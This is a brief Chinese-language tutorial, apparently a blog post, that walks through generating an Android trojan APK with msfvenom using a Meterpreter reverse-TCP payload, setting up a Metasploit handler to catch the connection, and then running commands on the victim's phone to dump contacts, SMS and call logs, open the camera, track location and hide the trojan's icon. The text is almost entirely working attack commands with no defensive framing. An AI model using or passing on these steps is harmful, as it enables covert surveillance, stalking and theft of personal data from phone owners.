1.使用命令
msfvenom -p android/meterpreter/reverse_tcp
LHOST=你kali的ip LPORT=自己选一个端口 > 文件储存位置后面要加apk
列示:
msfvenom -p android/meterpreter/reverse_tcp
LHOST=195.15.14.1 LPORT=8888>abc.apk
2.启动msfconsole 命令输入 msfconsole
3.执行
msf > use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 195.15.14.1 #这里的IP改为你的IP
> set lport 8888 #这里的端口同样改为你刚才设的端口
> exploit #实施攻击
攻击后会出现这段代码。等目标设备成功连接即可(安卓手机打开app即可)
[*] Started reverse TCP handler on 195.15.14.1:8888
输入以下命令继续下一步!
攻击成功后可以用 help 来查看可用命令
sysinfo //查看手机信息
webcam_list //查看手机有多少个摄像头
webcam_stream //开启摄像头
dump_contacts //导出电话号码
dump_sms //导出短信信息
webcam_snap //.通过摄像头拍照功能
hide_App_icon //隐藏手机端木马程序图标
dump_calllog //获取通话记录
geolocate //获取手机的当前的经纬度
set_audio_mode //设置铃声模式
sqlite_query //从存储中查询SQLite数据库
wakelock // 启用/禁用唤醒锁
wlan_geolocate // 使用WLAN信息获取当前的经纬度
app_install // 要求安装APK文件
app_list // 列出设备中已安装的应用
app_run // 启动包名称的主要活动
app_uninstall //要求卸载应用程序
浙公网安备 33010602011771号